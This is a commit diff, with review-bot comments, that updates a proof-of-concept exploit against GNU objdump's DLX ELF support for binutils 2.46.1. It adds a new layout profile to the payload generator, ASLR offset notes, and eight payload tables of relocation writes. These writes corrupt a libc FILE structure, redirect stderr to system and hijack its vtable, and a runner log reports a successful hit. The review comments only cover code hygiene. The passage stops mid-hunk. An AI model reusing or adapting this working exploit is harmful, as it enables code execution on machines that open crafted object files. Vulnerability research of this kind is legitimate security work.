Update objdump DLX PoC for binutils 2.46.1

ashton
2026-06-25 06:16:10 -05:00
parent 69f79515e7
commit 9454cb7b48
35 changed files with 344 additions and 3 deletions


@@ -10,6 +10,14 @@ Tested against a binutils-gdb master build from commit:
c311f4d37f31ff3fbb5db6923abcdf93bb75a37b c311f4d37f31ff3fbb5db6923abcdf93bb75a37b
``` ```
Also validated against the official GNU Binutils 2.46.1 release tarball with a
clean `dlx-elf` objdump build:
```text
GNU objdump (GNU Binutils) 2.46.1
elf32-dlx
```
## whats in here ## whats in here
- `payloads/*.bin` - crafted ELF/DLX object files to feed to `objdump` - `payloads/*.bin` - crafted ELF/DLX object files to feed to `objdump`
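Review bot: The added 2.46.1 validation paragraph identifies the build only by its `objdump` version banner, while the master build just above it is pinned by a full commit hash. Record the release tarball's checksum next to the banner so the `dlx-elf` build can be tied to one exact source; the offsets documented later in this commit differ between builds, so the version string alone does not say which layout applies.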
@@ -27,18 +35,32 @@ The payload files are named `.bin` because they are raw binary files, but the fi
ASLR stays on. Because of that, one exact payload is not guaranteed to land every time. The files in `payloads/` are a small set of guesses for the address layout seen during testing. ASLR stays on. Because of that, one exact payload is not guaranteed to land every time. The files in `payloads/` are a small set of guesses for the address layout seen during testing.
The generator emits the original profile plus a WSL/Ubuntu 24.04 profile measured against the pinned `dlx-elf` build. The second profile keeps ASLR on but uses stable relative offsets observed in the target process: The generator emits the original profile, a WSL/Ubuntu 24.04 profile measured
against the pinned `dlx-elf` build, and a profile measured against a clean GNU
Binutils 2.46.1 `dlx-elf` build. The profiles keep ASLR on but use stable
relative offsets observed in the target process:
```text ```text
layout=wsl2404 off_io=-0x3690 off_sec=0xbb0 rbase=0x220 layout=wsl2404 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
buf_delta=0x702fff00 or 0x6f300000 buf_delta=0x702fff00 or 0x6f300000
system_delta=0x7042e500 or 0x7043e4ff system_delta=0x7042e500 or 0x7043e4ff
layout=gnu2461 off_io=-0x3690 off_sec=0xbb8 rbase=0x190 sec_size_offset=0x40
buf_delta=0x702fff00 or 0x6f300000
system_delta=0x7042e500 or 0x7043e4ff
``` ```
That is an ASLR-on relative-delta strategy, not a universal single-shot info-leak bypass. A miss can still happen, so the runner keeps the retry loop. That is an ASLR-on relative-delta strategy, not a universal single-shot info-leak bypass. A miss can still happen, so the runner keeps the retry loop.
More detail is in `docs/aslr-bypass-analysis.md`. More detail is in `docs/aslr-bypass-analysis.md`.
The `gnu2461` profile was validated with the existing runner:
```text
HIT try=1 payload=.../payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.bin
CALC_HELPER_RAN 2026-06-25T11:14:27Z
```
So a plain crash like this does not always mean the PoC failed: So a plain crash like this does not always mean the PoC failed:
```text ```text
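Review bot: The added `HIT try=1` transcript is a single run, yet the paragraph above it says a miss can still happen and that the runner keeps its retry loop. State how many runs the `gnu2461` validation covered and how many of them hit, so "validated" is not read as deterministic. Separately, the new `layout=gnu2461` line carries `sec_size_offset=0x40` while the `layout=wsl2404` line has no such field; add `sec_size_offset=0x38` there so both lines have the same shape.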


@@ -14,6 +14,8 @@ The current generator emits:
- `orig`: the first measured profile. - `orig`: the first measured profile.
- `wsl2404`: offsets measured against the pinned `dlx-elf` build on - `wsl2404`: offsets measured against the pinned `dlx-elf` build on
WSL/Ubuntu 24.04. WSL/Ubuntu 24.04.
- `gnu2461`: offsets measured against a clean GNU Binutils 2.46.1 `dlx-elf`
objdump build.
The `wsl2404` profile uses: The `wsl2404` profile uses:
@@ -25,6 +27,22 @@ buf_delta=0x702fff00 or 0x6f300000
system_delta=0x7042e500 or 0x7043e4ff system_delta=0x7042e500 or 0x7043e4ff
``` ```
The `gnu2461` profile uses:
```text
off_io=-0x3690
off_sec=0xbb8
sec_size_offset=0x40
rbase=0x190
buf_delta=0x702fff00 or 0x6f300000
system_delta=0x7042e500 or 0x7043e4ff
```
The 2.46.1 profile differs because the relocation cache array moved from
`data+0x220` to `data+0x190`, the BFD section object moved from `data+0xbb0`
to `data+0xbb8`, and the `bfd_section.size` field used to widen generic
relocation range checks is at section offset `0x40`.
## Why argv two-stage is not enough ## Why argv two-stage is not enough
A deterministic leak-then-exploit route would need this sequence in one A deterministic leak-then-exploit route would need this sequence in one
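Review bot: The closing paragraph of the added text gives before and after values for the relocation cache array and the section object, but for `bfd_section.size` it only says the field "is at section offset `0x40`". Say that it moved from `0x38`, the value the generator assigns to the other two profiles, so the three comparisons stay parallel. No hunk in this file adds a `sec_size_offset=0x38` line to the `wsl2404` listing either, so the two profile listings end up with different fields.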


@@ -36,6 +36,7 @@ LAYOUTS = (
"name": "orig", "name": "orig",
"off_io": OFF_IO, "off_io": OFF_IO,
"off_sec": OFF_SEC, "off_sec": OFF_SEC,
"sec_size_offset": 0x38,
"rbase": RBASE, "rbase": RBASE,
"buf_deltas": BUF_TO_FILE_BE32_DELTAS, "buf_deltas": BUF_TO_FILE_BE32_DELTAS,
"wide_deltas": WIDE_TO_FAKE_BE32_DELTAS, "wide_deltas": WIDE_TO_FAKE_BE32_DELTAS,
@@ -45,11 +46,22 @@ LAYOUTS = (
"name": "wsl2404", "name": "wsl2404",
"off_io": -0x3690, "off_io": -0x3690,
"off_sec": 0xBB0, "off_sec": 0xBB0,
"sec_size_offset": 0x38,
"rbase": 0x220, "rbase": 0x220,
"buf_deltas": (0x702FFF00, 0x6F300000), "buf_deltas": (0x702FFF00, 0x6F300000),
"wide_deltas": WIDE_TO_FAKE_BE32_DELTAS, "wide_deltas": WIDE_TO_FAKE_BE32_DELTAS,
"system_deltas": STDERR_TO_SYSTEM_BE32_DELTAS, "system_deltas": STDERR_TO_SYSTEM_BE32_DELTAS,
}, },
{
"name": "gnu2461",
"off_io": -0x3690,
"off_sec": 0xBB8,
"sec_size_offset": 0x40,
"rbase": 0x190,
"buf_deltas": (0x702FFF00, 0x6F300000),
"wide_deltas": WIDE_TO_FAKE_BE32_DELTAS,
"system_deltas": STDERR_TO_SYSTEM_BE32_DELTAS,
},
) )
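Review bot: The new `gnu2461` entry repeats `wsl2404`'s `off_io` value and its `buf_deltas` tuple as fresh literals, and `"sec_size_offset": 0x38` is now written out in both older entries, whereas the `orig` entry takes its other fields from named constants (`OFF_IO`, `OFF_SEC`, `RBASE`). Hoist the shared values into module-level constants, with a one-line comment saying which build each was measured against, so a later re-measurement is changed in one place.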
@@ -85,8 +97,8 @@ def build(out_dir):
file_system_slot = off_io + 0x68 file_system_slot = off_io + 0x68
file_wide_data = off_io + 0xA0 file_wide_data = off_io + 0xA0
file_vtable = off_io + 0xD8 file_vtable = off_io + 0xD8
section_size_low = off_sec + 0x38 section_size_low = off_sec + layout["sec_size_offset"]
section_size_high = off_sec + 0x3C section_size_high = section_size_low + 4
for flag_byte4 in (0x05, 0x06): for flag_byte4 in (0x05, 0x06):
for buf_delta in layout["buf_deltas"]: for buf_delta in layout["buf_deltas"]:
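Review bot: `section_size_high = section_size_low + 4` drops the old `0x3C` literal without saying why the second value is four bytes on; add a comment that the two names are the low and high 32-bit halves of one size field. `layout["sec_size_offset"]` is also indexed directly, so a layout added later without the key fails with a bare `KeyError` in the middle of `build`; check the required keys of every `LAYOUTS` entry once, up front, and name the offending layout in the error.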
@@ -131,6 +143,7 @@ def build(out_dir):
f"system_delta=0x{system_delta:08x}", f"system_delta=0x{system_delta:08x}",
"command=P", "command=P",
f"off_io={off_io:#x} off_sec={off_sec:#x} rbase={rbase:#x}", f"off_io={off_io:#x} off_sec={off_sec:#x} rbase={rbase:#x}",
f"sec_size_offset={layout['sec_size_offset']:#x}",
"", "",
] ]
+ [ + [
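Review bot: `sec_size_offset` is formatted straight from `layout['sec_size_offset']` on a line of its own, while `off_io`, `off_sec` and `rbase` on the line above come from locals and share one line. Bind a local next to the others, and either append the field to that existing line or mention the longer header in the docs, since every notes file already in the tree gains a line as a result.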


@@ -0,0 +1,34 @@
layout=gnu2461
flag_byte4=0x05
buf_delta=0x6f300000
wide_delta=0x4fff0000
system_delta=0x7042e500
command=P
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
sec_size_offset=0x40
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
024 target=0x0 sym=0x00000000 pad R_DLX_NONE
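Review bot: Committing this generated notes file, and the seven `gnu2461` files after it, risks drift from the generator: the eight differ only in the `flag_byte4`, `buf_delta` and `system_delta` header lines and in rows 012 and 015, which repeat the last two values. Add a check that regenerating produces identical files, or keep only the generator and one sample in the tree. Rows 006 to 009 are also described only by address ("write bytes at 0xbf8"), unlike the later rows that name the field being written; label them the same way.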


@@ -0,0 +1,34 @@
layout=gnu2461
flag_byte4=0x05
buf_delta=0x6f300000
wide_delta=0x4fff0000
system_delta=0x7043e4ff
command=P
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
sec_size_offset=0x40
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
024 target=0x0 sym=0x00000000 pad R_DLX_NONE


@@ -0,0 +1,34 @@
layout=gnu2461
flag_byte4=0x05
buf_delta=0x702fff00
wide_delta=0x4fff0000
system_delta=0x7042e500
command=P
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
sec_size_offset=0x40
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
024 target=0x0 sym=0x00000000 pad R_DLX_NONE


@@ -0,0 +1,34 @@
layout=gnu2461
flag_byte4=0x05
buf_delta=0x702fff00
wide_delta=0x4fff0000
system_delta=0x7043e4ff
command=P
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
sec_size_offset=0x40
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
024 target=0x0 sym=0x00000000 pad R_DLX_NONE


@@ -0,0 +1,34 @@
layout=gnu2461
flag_byte4=0x06
buf_delta=0x6f300000
wide_delta=0x4fff0000
system_delta=0x7042e500
command=P
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
sec_size_offset=0x40
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
024 target=0x0 sym=0x00000000 pad R_DLX_NONE


@@ -0,0 +1,34 @@
layout=gnu2461
flag_byte4=0x06
buf_delta=0x6f300000
wide_delta=0x4fff0000
system_delta=0x7043e4ff
command=P
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
sec_size_offset=0x40
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
024 target=0x0 sym=0x00000000 pad R_DLX_NONE


@@ -0,0 +1,34 @@
layout=gnu2461
flag_byte4=0x06
buf_delta=0x702fff00
wide_delta=0x4fff0000
system_delta=0x7042e500
command=P
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
sec_size_offset=0x40
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
024 target=0x0 sym=0x00000000 pad R_DLX_NONE


@@ -0,0 +1,34 @@
layout=gnu2461
flag_byte4=0x06
buf_delta=0x702fff00
wide_delta=0x4fff0000
system_delta=0x7043e4ff
command=P
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
sec_size_offset=0x40
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
024 target=0x0 sym=0x00000000 pad R_DLX_NONE


@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7042e500 system_delta=0x7042e500
command=P command=P
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
sec_size_offset=0x38
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3


@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7043e4ff system_delta=0x7043e4ff
command=P command=P
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
sec_size_offset=0x38
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3


@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7042e500 system_delta=0x7042e500
command=P command=P
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
sec_size_offset=0x38
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3


@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7043e4ff system_delta=0x7043e4ff
command=P command=P
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
sec_size_offset=0x38
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3


@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7042e500 system_delta=0x7042e500
command=P command=P
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
sec_size_offset=0x38
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3


@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7043e4ff system_delta=0x7043e4ff
command=P command=P
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
sec_size_offset=0x38
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3


@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7042e500 system_delta=0x7042e500
command=P command=P
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
sec_size_offset=0x38
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3


@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7043e4ff system_delta=0x7043e4ff
command=P command=P
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
sec_size_offset=0x38
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3


@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7042e500 system_delta=0x7042e500
command=P command=P
off_io=-0x3690 off_sec=0xbb0 rbase=0x220 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
sec_size_offset=0x38
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3


@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7043e4ff system_delta=0x7043e4ff
command=P command=P
